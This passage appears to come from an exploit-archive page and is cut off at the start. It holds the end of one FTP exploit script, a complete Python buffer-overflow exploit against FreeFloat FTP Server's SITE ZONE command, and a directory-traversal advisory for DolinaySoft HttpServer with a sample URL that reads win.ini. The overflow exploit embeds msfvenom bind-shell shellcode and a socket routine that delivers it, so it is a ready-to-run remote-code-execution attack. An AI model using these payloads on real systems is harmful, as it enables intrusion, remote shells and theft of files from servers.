hacker@hacker.net\r\n') s.recv(1024) print ''' Successfull Exploitation! ''' message = 'dir ' + remotecode s.send(message) s.recv(1024) s.close
  16. #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command # Date: 04/11/2016 # Exploit Author: Luis Noriega # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.0 # Tested on: Windows XP Profesional V. 5.1 Service Pack 3 # CVE : n/a import socket # shellcode with metasploit: # msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c # nc 192.168.1.150 4444 ret = "\x2F\x1D\xF1\x77" # GDI32.dll shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" "\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a" "\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11" "\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac" "\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4" "\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07" "\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c" "\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53" "\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8" "\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48" "\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39" "\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e" "\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35" "\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77" "\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde" "\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51" "\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41" "\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52" "\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83" "\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2" "\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34" "\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0" "\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4" "\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe") buffer = 
'\x90' * 30 + shellcode buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer)) print "Sending Buffer" s = socket.socket(socket.AF_INET, socket. SOCK_STREAM) connect = s.connect(('192.168.1.150', 21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('SITE ZONE' + buffer1 + '\r\n') s.close()
  17. Hacking

    # Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal # Date: 2017-03-19 # Exploit Author: malwrforensics # Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download # Version: 1.0 # Tested on: Windows Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Example: Assuming the root folder is c:\<app_folder>\<html_folder> http://<server>/..%5c..%5c/windows/win.ini